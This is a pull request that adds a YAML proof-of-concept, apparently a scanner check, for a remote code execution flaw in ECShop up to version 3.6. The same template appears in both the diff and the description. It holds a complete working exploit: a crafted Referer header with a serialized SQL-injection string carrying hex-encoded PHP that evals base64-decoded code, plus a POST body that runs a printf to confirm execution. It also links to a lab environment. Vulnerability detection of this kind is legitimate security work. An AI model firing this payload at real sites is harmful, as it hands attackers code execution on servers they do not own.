### PR TITLE
poc-yaml-ecshop-3.6.0-rce

### DIFF
--- a/pocs/poc-yaml-ecshop-3.6.0-rce
+++ b/pocs/poc-yaml-ecshop-3.6.0-rce
@@ -1,0 +1,30 @@
+Summary
+ECShop <= 2.x/3.6.x/3.0.x 版本远程代码执行高危漏洞利用
+漏洞分析：
+https://xz.aliyun.com/t/2689
+
+POC
+name: poc-yaml-ecshop-3.6.0-rce
+rules:
+  - method: POST
+    path: /user.php
+    headers:
+      User-Agent: >-
+        Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101
+        Firefox/68.0
+      Referer: >-
+        45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select
+        1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'
+        union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a
+      Content-Type: application/x-www-form-urlencoded
+    body: action=login&vulnspy=printf(153246879-159);
+    follow_redirects: false
+    expression: status == 200 && body.bcontains(b'153246720')
+
+
+Test Environment
+https://www.vulnspy.com/cn-ecshop-3.x.x-rce-exploit/
+有在线的实验环境，打开就可以测试了
+
+Remarks
+Write you voice here.


### PR DESCRIPTION
## Summary
ECShop <= 2.x/3.6.x/3.0.x 版本远程代码执行高危漏洞利用
漏洞分析：
https://xz.aliyun.com/t/2689

## POC

```yaml
name: poc-yaml-ecshop-3.6.0-rce
rules:
  - method: POST
    path: /user.php
    headers:
      User-Agent: >-
        Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:68.0) Gecko/20100101
        Firefox/68.0
      Referer: >-
        45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select
        1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'
        union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a
      Content-Type: application/x-www-form-urlencoded
    body: action=login&vulnspy=printf(153246879-159);
    follow_redirects: false
    expression: status == 200 && body.bcontains(b'153246720')
```

## Test Environment

https://www.vulnspy.com/cn-ecshop-3.x.x-rce-exploit/
有在线的实验环境，打开就可以测试了


Dockerfile: 
```dockerfile
https://github.com/vulnspy/ECShop_3.6.0_UTF8_vuln_installed
```

## Remarks

Write you voice here.
